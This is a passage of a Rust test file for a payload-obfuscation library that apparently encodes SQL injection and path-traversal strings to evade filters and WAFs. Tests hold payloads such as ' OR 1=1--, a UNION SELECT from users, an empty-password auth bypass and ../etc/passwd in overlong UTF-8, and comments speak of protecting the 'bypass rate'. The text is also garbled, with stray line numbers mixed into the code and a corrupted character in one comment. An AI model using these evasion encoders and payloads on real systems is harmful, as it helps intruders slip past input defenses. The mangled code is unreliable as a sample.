1654 let encoded = math_bold_encode("' OR 1=1--");
1655 // ' space = = - - all unchanged
1656 assert!(encoded.starts_with('\''));
1657 assert!(encoded.contains('='));
1658 assert!(encoded.ends_with("--"));
1659 }
1660
#[test]
fn math_bold_encode_mixed_alphanumeric() {
    // One capital, one lowercase letter and one digit, checked by code point.
    let code_points: Vec<u32> = math_bold_encode("Aa0").chars().map(u32::from).collect();
    assert_eq!(code_points.len(), 3);
    assert_eq!(code_points[0], 0x1D400);
    assert_eq!(code_points[1], 0x1D41A);
    assert_eq!(code_points[2], 0x1D7CE);
}
1671
#[test]
fn math_bold_encode_distinct_from_fullwidth() {
    // Math bold lives around U+1D400 and fullwidth around U+FF00, so the
    // two encoders must never agree on the same input.
    let bold = math_bold_encode("SELECT");
    let fullwidth = fullwidth_encode("SELECT");
    assert_ne!(bold, fullwidth);
}
1678
#[test]
fn math_bold_encode_empty() {
    // Empty payload in, empty payload out.
    let encoded = math_bold_encode("");
    assert_eq!(encoded, "");
}
1683
// ── math_italic / script / fraktur / double_struck tests ────────────
1685
#[test]
fn math_italic_encode_uppercase() {
    // First and last capital: 'A' -> U+1D434, 'Z' -> U+1D44D.
    for (plain, italic) in [("A", "\u{1D434}"), ("Z", "\u{1D44D}")] {
        assert_eq!(math_italic_encode(plain), italic);
    }
}
1691
#[test]
fn math_italic_encode_handles_h_hole() {
    // The slot at U+1D455 is reserved, so lowercase 'h' is expected to come
    // back as U+210E instead.
    let encoded = math_italic_encode("h");
    assert_eq!(encoded, "\u{210E}");
}
1697
#[test]
fn math_italic_encode_is_distinct_from_bold() {
    // Italic and bold must not produce the same output for one keyword.
    let italic = math_italic_encode("SELECT");
    let bold = math_bold_encode("SELECT");
    assert_ne!(italic, bold);
}
1702
#[test]
fn math_script_encode_fills_all_holes() {
    // No capital may fall through as plain ASCII: each of A..=Z has to come
    // back changed (and the call must not panic).
    for c in 'A'..='Z' {
        let plain = String::from(c);
        let enc = math_script_encode(&plain);
        assert!(
            enc != plain,
            "math_script_encode left {c} unchanged — hole not filled"
        );
    }
}
1716
#[test]
fn math_fraktur_encode_fills_chizr_holes() {
    // C, H, I, R and Z are the capitals named as holes for this alphabet;
    // none of them may be returned unchanged.
    for c in ['C', 'H', 'I', 'R', 'Z'] {
        let plain = String::from(c);
        let encoded = math_fraktur_encode(&plain);
        assert!(encoded != plain, "math_fraktur_encode left {c} unchanged");
    }
}
1727
#[test]
fn math_double_struck_encode_digits_distinct_from_bold() {
    // Double-struck zero is U+1D7D8 while bold zero is U+1D7CE, so the two
    // encoders must disagree on "0".
    let double_struck = math_double_struck_encode("0");
    let bold = math_bold_encode("0");
    assert_ne!(double_struck, bold);
}
1733
#[test]
fn math_double_struck_encode_fills_letter_holes() {
    // The capitals listed here are the holes this test covers; each must be
    // replaced by something other than itself.
    for letter in ['C', 'H', 'N', 'P', 'Q', 'R', 'Z'] {
        let plain = String::from(letter);
        let encoded = math_double_struck_encode(&plain);
        assert!(encoded != plain);
    }
}
1741
#[test]
fn letterlike_encode_select_payload_uses_letterlike_block() {
    let encoded = letterlike_encode("SELECT");
    // 'L' has a Letterlike Symbols counterpart: U+2112 SCRIPT CAPITAL L.
    assert!(encoded.contains('\u{2112}'));
    // 'S' has no letterlike-block equivalent and is expected to fall back
    // to circled Latin (circled capital S is U+24C8). The check accepts any
    // character in the circled Latin letter range U+24B6..=U+24E9.
    assert!(
        encoded
            .chars()
            .any(|c| ('\u{24B6}'..='\u{24E9}').contains(&c))
    );
}
1755
#[test]
fn letterlike_encode_preserves_non_letters() {
    // Spaces, a quote and an equals sign contain no letters to substitute.
    let payload = " ' = ";
    assert_eq!(letterlike_encode(payload), payload);
}
1760
#[test]
fn all_new_encoders_preserve_pure_punctuation() {
    // The payload has no letters and no digits, so every encoder must hand
    // it back untouched. Digits are left out on purpose because
    // math_double_struck_encode does transform them.
    let encoders = [
        math_italic_encode,
        math_script_encode,
        math_fraktur_encode,
        math_double_struck_encode,
        letterlike_encode,
    ];
    for encode in encoders {
        let out = encode("' = -- /* */ ;");
        assert_eq!(out, "' = -- /* */ ;");
    }
}
1776
#[test]
fn all_new_encoders_distinct_from_each_other() {
    // Push one keyword through every alphabet and require that no two
    // encoders agree: the set of outputs must be as large as the list.
    let s = "SELECT";
    let outputs = [
        math_bold_encode(s),
        math_italic_encode(s),
        math_script_encode(s),
        math_fraktur_encode(s),
        math_double_struck_encode(s),
        letterlike_encode(s),
    ];
    let unique = outputs
        .iter()
        .collect::<std::collections::BTreeSet<&String>>();
    assert_eq!(
        unique.len(),
        outputs.len(),
        "two encoders produced identical output"
    );
}
1794
// ── zero-width + combining-mark injection tests ────────────────────
1796
#[test]
fn zero_width_inject_adds_chars_between_letters() {
    let out = zero_width_inject("script", '\u{200B}');
    // Either fragment is accepted as evidence that a separator was placed
    // between letters.
    let has_split_fragment = ["scr\u{200B}ipt", "s\u{200B}c"]
        .iter()
        .any(|fragment| out.contains(*fragment));
    assert!(has_split_fragment);
    // Six letters have five gaps, so five extra code points are expected.
    assert_eq!(out.chars().count(), 6 + 5);
}
1804
#[test]
fn zero_width_inject_preserves_non_alnum() {
    // Separators belong between alphanumeric characters only; the payload
    // opens with a quote, so nothing may be inserted in front of it.
    let out = zero_width_inject("' OR '1'='1", '\u{200C}');
    let starts_with_separator = out.starts_with('\u{200C}');
    assert!(!starts_with_separator);
}
1812
#[test]
fn zero_width_defaults_count_correct() {
    // The default rotation is expected to hold five entries
    // (ZWSP, ZWNJ, ZWJ, BOM, CGJ).
    let entries = ZERO_WIDTH_DEFAULTS.len();
    assert_eq!(entries, 5);
}
1818
#[test]
fn combining_mark_inject_only_after_letters() {
    // U+0308 must follow each letter ('a', 'b') and never a digit ('1', '2').
    let expected = "a\u{0308}1b\u{0308}2";
    let out = combining_mark_inject("a1b2", '\u{0308}');
    assert_eq!(out, expected);
}
1825
// ── script_homoglyph_encode tests ──────────────────────────────────
1827
#[test]
fn script_homoglyph_select_uses_cyrillic_letters() {
    let out = script_homoglyph_encode("SELECT");
    // 'E' is expected as U+0415 and 'T' as U+0422. What happens to 'S' is
    // deliberately left unchecked.
    for cyrillic in ['\u{0415}', '\u{0422}'] {
        assert!(out.contains(cyrillic));
    }
    // The result must not be the plain ASCII keyword.
    assert_ne!(out, "SELECT");
}
1839
#[test]
fn script_homoglyph_preserves_punctuation() {
    // A payload with no letters has nothing to substitute.
    let payload = "' = -- ;";
    assert_eq!(script_homoglyph_encode(payload), payload);
}
1844
// ── turkish_i + sharp_s tests ──────────────────────────────────────
1846
#[test]
fn turkish_i_encode_replaces_only_i() {
    // 'i' becomes U+0131, 'I' becomes U+0130, and a payload without either
    // letter is returned unchanged.
    let cases = [
        ("script", "scr\u{0131}pt"),
        ("INSERT", "\u{0130}NSERT"),
        ("abcdefg", "abcdefg"),
    ];
    for (input, expected) in cases {
        assert_eq!(turkish_i_encode(input), expected);
    }
}
1854
#[test]
fn sharp_s_encode_replaces_only_s() {
    // Both 's' and 'S' are expected as U+00DF; other letters stay put.
    let cases = [("select", "\u{00DF}elect"), ("SELECT", "\u{00DF}ELECT")];
    for (input, expected) in cases {
        assert_eq!(sharp_s_encode(input), expected);
    }
}
1860
// ── json_key_unicode_escape tests ──────────────────────────────────
1862
#[test]
fn json_key_escape_full_id_payload() {
    let s = json_key_unicode_escape("id", "1 OR 1=1--");
    // The key characters 'i' and 'd' must appear as \u0069 and \u0064, and
    // the value text must still be present in the output.
    for needle in ["\\u0069", "\\u0064", "1 OR 1=1--"] {
        assert!(s.contains(needle));
    }
}
1872
#[test]
fn json_key_escape_round_trips_through_serde() {
    let s = json_key_unicode_escape("admin", "true");
    // A JSON parser has to accept the output and decode the escaped key
    // back to the plain "admin".
    let parsed = serde_json::from_str::<serde_json::Value>(&s).expect("valid JSON");
    let key_present = parsed.get("admin").is_some();
    assert!(key_present, "decoded key missing: {s}");
}
1880
#[test]
fn json_key_escape_preserves_value_quotes() {
    // A double quote inside the value must show up backslash-escaped.
    let escaped_value = "v\\\"q";
    let s = json_key_unicode_escape("k", "v\"q");
    assert!(s.contains(escaped_value));
}
1887
// ── overlong_utf8_path tests ───────────────────────────────────────
1889
#[test]
fn overlong_utf8_2byte_dot_slash_replaces() {
    // With 2-byte forms '.' is expected as %c0%ae and '/' as %c0%af, while
    // the remaining path characters stay literal.
    let out = overlong_utf8_path("../etc/passwd", 2);
    assert_eq!(out, "%c0%ae%c0%ae%c0%afetc%c0%afpasswd");
}
1897
#[test]
fn overlong_utf8_3byte_dot_slash() {
    // With 3-byte forms each '.' is expected as %e0%80%ae.
    assert_eq!(overlong_utf8_path("..", 3), "%e0%80%ae%e0%80%ae");
}
1903
#[test]
fn overlong_utf8_4byte_default() {
    // With 4-byte forms a single '.' is expected as %f0%80%80%ae.
    assert_eq!(overlong_utf8_path(".", 4), "%f0%80%80%ae");
}
1909
#[test]
fn overlong_utf8_preserves_non_traversal_chars() {
    // The directory and file names carry no traversal characters and must
    // remain readable in the output.
    let out = overlong_utf8_path("../etc/passwd", 2);
    for segment in ["etc", "passwd"] {
        assert!(out.contains(segment));
    }
}
1916
#[test]
fn overlong_utf8_handles_backslash() {
    // Pins the expected 2-byte output for a Windows-style separator:
    // the backslash comes back as %c0%5c.
    let out = overlong_utf8_path("..\\windows", 2);
    assert_eq!(out, "%c0%ae%c0%ae%c0%5cwindows");
}
1924
// ── bidi_inject tests ──────────────────────────────────────────────
1926
#[test]
fn bidi_inject_wraps_with_rlo_and_pdf() {
    // The payload must be framed by U+202E (RLO) in front and U+202C (PDF)
    // behind, adding exactly two code points to the six letters.
    let (rlo, pdf) = ('\u{202E}', '\u{202C}');
    let out = bidi_inject("tceleS");
    assert!(out.starts_with(rlo));
    assert!(out.ends_with(pdf));
    assert_eq!(out.chars().count(), 8);
}
1935
// ── sql_concat_split tests ─────────────────────────────────────────
1937
#[test]
fn sql_concat_split_admin() {
    // A quoted literal becomes CONCAT over its individual characters.
    let out = sql_concat_split("'admin'");
    assert_eq!(out, "CONCAT('a','d','m','i','n')");
}
1942
#[test]
fn sql_concat_split_password() {
    // Repeated letters ('s', 's') each get their own CONCAT argument.
    let out = sql_concat_split("'password'");
    assert_eq!(out, "CONCAT('p','a','s','s','w','o','r','d')");
}
1950
#[test]
fn sql_concat_split_in_clause() {
    // Text in front of the literal is carried over verbatim.
    let out = sql_concat_split("WHERE u='admin'");
    assert_eq!(out, "WHERE u=CONCAT('a','d','m','i','n')");
}
1958
#[test]
fn sql_concat_split_no_quotes_passthrough() {
    // Without any single quote there is nothing to rewrite.
    let payload = "SELECT 1";
    assert_eq!(sql_concat_split(payload), payload);
}
1964
#[test]
fn sql_concat_split_multiple_literals() {
    // Each literal is rewritten independently into its own CONCAT call.
    let out = sql_concat_split("'a' OR 'b'");
    assert_eq!(out, "CONCAT('a') OR CONCAT('b')");
}
1970
#[test]
fn sql_concat_split_empty_literal() {
    // An empty literal is expected as CONCAT wrapped around an empty string.
    let out = sql_concat_split("''");
    assert_eq!(out, "CONCAT('')");
}
1975
#[test]
fn sql_concat_split_unbalanced_quote_passthrough() {
    // An opening quote that is never closed must be left as it was.
    let payload = "'unclosed";
    assert_eq!(sql_concat_split(payload), payload);
}
1981
#[test]
fn sql_concat_split_preserves_non_quote_chars() {
    // Keywords and the FROM clause survive, while both single-character
    // literals are turned into CONCAT calls.
    let out = sql_concat_split("1=1; SELECT 'x', 'y' FROM dual");
    for needle in ["SELECT", "FROM dual", "CONCAT('x')", "CONCAT('y')"] {
        assert!(out.contains(needle));
    }
}
1992
#[test]
fn sql_concat_split_real_injection_payload() {
    // Classic UNION SELECT extraction. The leading quote is unbalanced, so
    // the first quoted region runs up to the quote before `admin` and the
    // SQL keywords end up as CONCAT arguments. That is not a useful
    // execution path by itself; it only shows the tamper treats every
    // single-quoted region alike, so other tampers can be layered on top.
    // Payloads that really benefit close the opening quote before the SQL
    // keywords, e.g. "1' UNION SELECT 'admin'--", where the embedded
    // 'admin' is the bypass target.
    let rewritten = sql_concat_split("' UNION SELECT 'admin','password' FROM users--");
    assert!(rewritten.contains("CONCAT("));
}
2008
// ── sql_char_decompose tests ───────────────────────────────────────
2010
#[test]
fn sql_char_decompose_admin() {
    // Code points: a=97, d=100, m=109, i=105, n=110.
    let out = sql_char_decompose("'admin'");
    assert_eq!(out, "CHAR(97,100,109,105,110)");
}
2016
#[test]
fn sql_char_decompose_password() {
    // Code points: p=112, a=97, s=115, s=115, w=119, o=111, r=114, d=100.
    let out = sql_char_decompose("'password'");
    assert_eq!(out, "CHAR(112,97,115,115,119,111,114,100)");
}
2024
#[test]
fn sql_char_decompose_path_literal() {
    // Punctuation inside the literal is converted as well:
    // /=47 e=101 t=116 c=99 /=47 p=112 a=97 s=115 s=115 w=119 d=100.
    let out = sql_char_decompose("'/etc/passwd'");
    assert_eq!(out, "CHAR(47,101,116,99,47,112,97,115,115,119,100)");
}
2034
#[test]
fn sql_char_decompose_no_quotes_passthrough() {
    // No quoted literal means no rewrite.
    let payload = "SELECT 1";
    assert_eq!(sql_char_decompose(payload), payload);
}
2039
#[test]
fn sql_char_decompose_empty_literal_preserves_empty_string() {
    // F60 regression. Before the fix `''` turned into `CHAR()`, which is
    // NULL in MySQL and therefore broke the `pass='' OR 1=1` auth bypass
    // (`= NULL` is never TRUE). The empty literal must now come back
    // untouched, both alone and embedded in a longer payload.
    for payload in ["''", "WHERE pass='' OR 1=1"] {
        assert_eq!(sql_char_decompose(payload), payload);
    }
}
2053
2054 // sql_char_decompose_empty_literal_preserves_empty_string above
// supersedes the pre-fix test that asserted CHAR() — kept as a
2056 // marker rather than re-asserting the buggy old contract.
2057
#[test]
fn sql_char_decompose_unbalanced_passthrough() {
    // A literal that never closes is left alone.
    let payload = "'unclosed";
    assert_eq!(sql_char_decompose(payload), payload);
}
2062
#[test]
fn sql_char_decompose_multiple_literals() {
    // Two literals, two CHAR calls: a=97 and b=98.
    let out = sql_char_decompose("'a' OR 'b'");
    assert_eq!(out, "CHAR(97) OR CHAR(98)");
}
2068
#[test]
fn sql_char_decompose_distinct_from_concat_split() {
    // CHAR takes integers whereas CONCAT takes one-character strings, so
    // the two tampers must differ on the same literal.
    let via_char = sql_char_decompose("'admin'");
    let via_concat = sql_concat_split("'admin'");
    assert_ne!(via_char, via_concat);
}
2074
#[test]
fn sql_char_decompose_real_injection() {
    // Only the quoted literal changes; the condition in front and the
    // trailing comment marker are carried over verbatim.
    let rewritten = sql_char_decompose("1 OR username='admin'--");
    assert_eq!(rewritten, "1 OR username=CHAR(97,100,109,105,110)--");
}
2081
// ── pg_chr_decompose tests ─────────────────────────────────────────
2083
#[test]
fn pg_chr_decompose_admin() {
    // Each character becomes its own CHR() call, joined with `||` inside
    // one pair of parentheses.
    let out = pg_chr_decompose("'admin'");
    assert_eq!(out, "(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))");
}
2091
#[test]
fn pg_chr_decompose_empty_literal() {
    // An empty literal is expected as a parenthesised empty string.
    let out = pg_chr_decompose("''");
    assert_eq!(out, "('')");
}
2096
#[test]
fn pg_chr_decompose_in_where_clause() {
    // Text in front of the literal is kept; a=97.
    let out = pg_chr_decompose("WHERE u='a'");
    assert_eq!(out, "WHERE u=(CHR(97))");
}
2101
#[test]
fn pg_chr_decompose_distinct_from_char_decompose() {
    // CHR() is unary and joined with pipes, CHAR() is variadic; the two
    // shapes must not coincide.
    let via_chr = pg_chr_decompose("'admin'");
    let via_char = sql_char_decompose("'admin'");
    assert_ne!(via_chr, via_char);
}
2107
#[test]
fn pg_chr_decompose_unbalanced_passthrough() {
    // A literal without a closing quote is returned unchanged.
    let payload = "'unclosed";
    assert_eq!(pg_chr_decompose(payload), payload);
}
2112
#[test]
fn sql_concat_split_isolated_literal_keeps_other_tokens() {
    // Modelled on a real payload: only the quoted 'admin' is rewritten,
    // the conditions on either side of it stay exactly as written.
    let expected = "id=1 AND username=CONCAT('a','d','m','i','n') AND status=1";
    let out = sql_concat_split("id=1 AND username='admin' AND status=1");
    assert_eq!(out, expected);
}
2123
#[test]
fn unicode_encode_empty() {
    // With no characters to escape the result is the empty string.
    let encoded = unicode_encode("");
    assert_eq!(encoded, "");
}
2128
// ── Fullwidth encoding tests ───────────────────────────────────────
2130
#[test]
fn fullwidth_encode_sql_keywords() {
    let encoded = fullwidth_encode("SELECT");
    // Fullwidth S, E, L, E, C, T. Written as escapes so the expectation
    // does not depend on how the bytes of this file are decoded.
    assert_eq!(encoded, "\u{FF33}\u{FF25}\u{FF2C}\u{FF25}\u{FF23}\u{FF34}");
    // Every output character must sit at or above U+FF01, the start of the
    // fullwidth ASCII variants.
    for ch in encoded.chars() {
        assert!(
            ch as u32 >= 0xFF01,
            "expected fullwidth char, got {ch} (U+{:04X})",
            ch as u32
        );
    }
}
2144
#[test]
fn fullwidth_encode_spaces() {
    // An ASCII space is expected to turn into U+3000 IDEOGRAPHIC SPACE.
    let encoded = fullwidth_encode("A B");
    let has_ideographic_space = encoded.contains('\u{3000}');
    assert!(
        has_ideographic_space,
        "space should become ideographic space"
    );
}
2153
#[test]
fn fullwidth_encode_preserves_non_ascii() {
    // Three CJK characters (U+65E5 U+672C U+8A9E), given as escapes so the
    // input is independent of the file's encoding. None of them is ASCII,
    // so the encoder has nothing to convert.
    let payload = "\u{65E5}\u{672C}\u{8A9E}";
    let encoded = fullwidth_encode(payload);
    assert_eq!(encoded, payload, "non-ASCII should pass through unchanged");
}
2159
#[test]
fn fullwidth_encode_operators() {
    // "1=1" is expected as fullwidth digit one (U+FF11), fullwidth equals
    // sign (U+FF1D), fullwidth digit one. Escapes keep the expectation
    // independent of the file's encoding.
    let encoded = fullwidth_encode("1=1");
    assert_eq!(encoded, "\u{FF11}\u{FF1D}\u{FF11}");
}
2165
#[test]
fn fullwidth_encode_sqli_payload() {
    let encoded = fullwidth_encode("' OR 1=1--");
    // The ASCII keyword must be gone and its fullwidth form (U+FF2F U+FF32)
    // present. Escapes are used because the fullwidth letters are easy to
    // confuse with ASCII and sensitive to how the file is decoded.
    assert!(!encoded.contains("OR"), "should not contain ASCII 'OR'");
    assert!(
        encoded.contains("\u{FF2F}\u{FF32}"),
        "should contain fullwidth '\u{FF2F}\u{FF32}'"
    );
}
2173
#[test]
fn fullwidth_encode_empty() {
    // Empty payload in, empty payload out.
    let encoded = fullwidth_encode("");
    assert_eq!(encoded, "");
}
2178
// ── Homoglyph encoding tests ───────────────────────────────────────
2180
#[test]
fn homoglyph_preserves_sql_string_delimiters() {
    // F56 regression. Before the fix the ASCII apostrophe was mapped to
    // U+2019, which is not a SQL string delimiter: the host query's
    // literal never closed and the injection went inert. The delimiter
    // has to survive verbatim.
    let encoded = homoglyph_encode("' OR '1'='1");
    let keeps_ascii_quote = encoded.contains('\'');
    assert!(
        keeps_ascii_quote,
        "ASCII single quote MUST be preserved for SQL: {encoded}"
    );
    let has_curly_quote = encoded.contains('\u{2019}');
    assert!(
        !has_curly_quote,
        "U+2019 right-single-quote must NOT appear: {encoded}"
    );
    // The equals sign is not a delimiter and is still expected to mutate,
    // which shows the encoder has not become a no-op.
    let has_fullwidth_equals = encoded.contains('\u{FF1D}');
    assert!(
        has_fullwidth_equals,
        "equals sign should still mutate to fullwidth: {encoded}"
    );
}
2205
#[test]
fn homoglyph_preserves_ascii_double_quote() {
    // Double quotes delimit strings too, so they must stay ASCII and must
    // not be swapped for U+201D.
    let encoded = homoglyph_encode("\"admin\" OR \"1\"=\"1\"");
    let keeps_ascii_quote = encoded.contains('"');
    assert!(
        keeps_ascii_quote,
        "ASCII double quote MUST be preserved: {encoded}"
    );
    let has_curly_quote = encoded.contains('\u{201D}');
    assert!(
        !has_curly_quote,
        "U+201D right-double-quote must NOT appear: {encoded}"
    );
}
2218
#[test]
fn homoglyph_replaces_angle_brackets() {
    // '<' and '>' must disappear in favour of U+FF1C and U+FF1E.
    let encoded = homoglyph_encode("<script>");
    let ascii_lt_left = encoded.contains('<');
    let ascii_gt_left = encoded.contains('>');
    assert!(!ascii_lt_left, "ASCII < should be replaced");
    assert!(!ascii_gt_left, "ASCII > should be replaced");
    let fullwidth_lt = encoded.contains('\u{FF1C}');
    let fullwidth_gt = encoded.contains('\u{FF1E}');
    assert!(fullwidth_lt, "should contain fullwidth <");
    assert!(fullwidth_gt, "should contain fullwidth >");
}
2227
#[test]
fn homoglyph_replaces_equals() {
    // '=' must be swapped for its fullwidth form U+FF1D.
    let encoded = homoglyph_encode("1=1");
    let ascii_equals_left = encoded.contains('=');
    assert!(!ascii_equals_left, "ASCII = should be replaced");
    let fullwidth_equals = encoded.contains('\u{FF1D}');
    assert!(fullwidth_equals, "should contain fullwidth =");
}
2234
#[test]
fn homoglyph_preserves_letters() {
    // This encoder leaves plain letters alone.
    let keyword = "SELECT";
    let encoded = homoglyph_encode(keyword);
    assert_eq!(encoded, keyword, "letters should be preserved");
}
2240
#[test]
fn homoglyph_encode_empty() {
    // Empty payload in, empty payload out.
    let encoded = homoglyph_encode("");
    assert_eq!(encoded, "");
}
2245
#[test]
fn homoglyph_replaces_parens() {
    // '(' and ')' are expected as U+FF08 and U+FF09.
    let encoded = homoglyph_encode("fn()");
    let has_open = encoded.contains('\u{FF08}');
    let has_close = encoded.contains('\u{FF09}');
    assert!(has_open, "should contain fullwidth (");
    assert!(has_close, "should contain fullwidth )");
}
2252
// ── Bug 2 regression: iis_unicode_encode non-BMP adversarial twins ──
2254 //
2255 // PRE-FIX BUG: the loop body cast `ch as u32` into a %uXXXX format
2256 // without checking whether `code > 0xFFFF`. For supplementary-plane
2257 // characters (U+10000 and above) this produced a 5-digit hex sequence
2258 // like `%u1F600`, which IIS's %u decoder rejects (its format is
2259 // strictly 4 hex digits). The bypass looked encoded but was actually
2260 // undecodable on any real IIS target โ a silent bypass-rate killer.
2261 // Fixed: emit a UTF-16 surrogate pair `%uHIGH%uLOW` for non-BMP chars.
2262
#[test]
fn iis_unicode_encode_lowest_non_bmp_u10000() {
    // U+10000 (LINEAR B SYLLABLE B008 A) is the first supplementary-plane
    // code point. The pre-fix encoder emitted the five-digit `%u10000`;
    // the expected output is the surrogate pair with high = 0xD800 and
    // low = 0xDC00.
    let input = String::from('\u{10000}');
    let encoded = iis_unicode_encode(&input);
    assert_eq!(
        encoded, "%uD800%uDC00",
        "U+10000 (lowest non-BMP) must encode as surrogate pair %uD800%uDC00, not the invalid %u10000"
    );
    // Guard against a regression: the text after each `%u` marker must
    // start with exactly four hex digits.
    let mut groups = encoded.split("%u");
    groups.next(); // whatever precedes the first marker is not a group
    for group in groups {
        let hex_part = group
            .chars()
            .take_while(char::is_ascii_hexdigit)
            .collect::<String>();
        assert_eq!(
            hex_part.len(),
            4,
            "every %u sequence must be exactly 4 hex digits (IIS spec); got {hex_part:?} in {encoded:?}"
        );
    }
}
2290
#[test]
fn iis_unicode_encode_high_cjk_supplement_u20000() {
    // U+20000 opens CJK Unified Ideographs Extension B. The pre-fix encoder
    // emitted the five-digit `%u20000`. Expected surrogate pair:
    //   base = 0x20000 - 0x10000        = 0x10000
    //   high = 0xD800 + (base >> 10)    = 0xD800 + 0x40 = 0xD840
    //   low  = 0xDC00 + (base & 0x3FF)  = 0xDC00 + 0x00 = 0xDC00
    let input = String::from('\u{20000}');
    let encoded = iis_unicode_encode(&input);
    assert_eq!(
        encoded, "%uD840%uDC00",
        "U+20000 (CJK Supplement) must encode as %uD840%uDC00"
    );
    // The text after each `%u` marker must start with exactly four hex digits.
    let mut groups = encoded.split("%u");
    groups.next(); // whatever precedes the first marker is not a group
    for group in groups {
        let hex_part = group
            .chars()
            .take_while(char::is_ascii_hexdigit)
            .collect::<String>();
        assert_eq!(
            hex_part.len(),
            4,
            "each %u group must be 4 hex digits; got {hex_part:?}"
        );
    }
}
2317
// ── §1 SPEED regression pins: byte-slice lookahead in json_unicode_alnum
2319 // and json_unicode_full (replacing Vec<char> collect). These tests pin
2320 // the observable contract so a revert to Vec<char> (or a bad rewrite
2321 // that breaks the ASCII-byte-boundary assumption) is caught immediately.
2322
#[test]
fn json_unicode_alnum_idempotency_multi_pre_escaped() {
    // Two already-escaped sequences (A, B) back to back. The lookahead has
    // to step over each of them, so neither the first nor a repeated pass
    // may alter the payload.
    let pre_escaped = "\\u0041\\u0042";
    let first_pass = json_unicode_alnum(pre_escaped);
    let second_pass = json_unicode_alnum(&first_pass);
    assert_eq!(
        first_pass, pre_escaped,
        "first pass on pre-escaped must be a no-op"
    );
    assert_eq!(
        second_pass, pre_escaped,
        "second pass must also be a no-op"
    );
}
2335
#[test]
fn json_unicode_alnum_incomplete_escape_not_skipped() {
    // `\u004` has only three hex digits after the `u`, so it is not a
    // complete `\uXXXX` escape. The lookahead must demand all four digits
    // and therefore must not pass this input through verbatim; the
    // alphanumeric characters in it are expected to be escaped.
    let incomplete = "\\u004";
    let out = json_unicode_alnum(incomplete);
    assert_ne!(out, incomplete, "incomplete escape must not be skipped");
}
2348
#[test]
fn json_unicode_full_idempotency_multi_pre_escaped() {
    // Same check as for json_unicode_alnum: two pre-escaped sequences must
    // survive one pass and a repeated pass unchanged.
    let pre_escaped = "\\u0041\\u0042";
    let first_pass = json_unicode_full(pre_escaped);
    let second_pass = json_unicode_full(&first_pass);
    assert_eq!(
        first_pass, pre_escaped,
        "first pass: pre-escaped must survive"
    );
    assert_eq!(second_pass, pre_escaped, "second pass: still a no-op");
}
2358
#[test]
fn json_unicode_full_escapes_non_alnum_too() {
    // The "full" variant escapes every character, so the apostrophe
    // (U+0027) and the space (U+0020) must both appear in \uXXXX form.
    let out = json_unicode_full("' '");
    let apostrophe_escaped = out.contains("\\u0027");
    let space_escaped = out.contains("\\u0020");
    assert!(apostrophe_escaped, "apostrophe must be escaped");
    assert!(space_escaped, "space must be escaped");
}
2368
#[test]
fn overlong_utf8_path_speed_opt_preserves_passthrough_chars() {
    // Pins the contract of the push-loop rewrite: ordinary characters are
    // copied through, while every dot and slash is replaced.
    let out = overlong_utf8_path("admin/../secret.txt", 2);
    for kept in ["admin", "secret", "txt"] {
        assert!(out.contains(kept));
    }
    for replaced in ['.', '/'] {
        assert!(!out.contains(replaced));
    }
}
2380
#[test]
fn overlong_utf8_path_empty_input_empty_output() {
    // An empty path yields an empty result.
    let out = overlong_utf8_path("", 2);
    assert_eq!(out, "");
}
2385}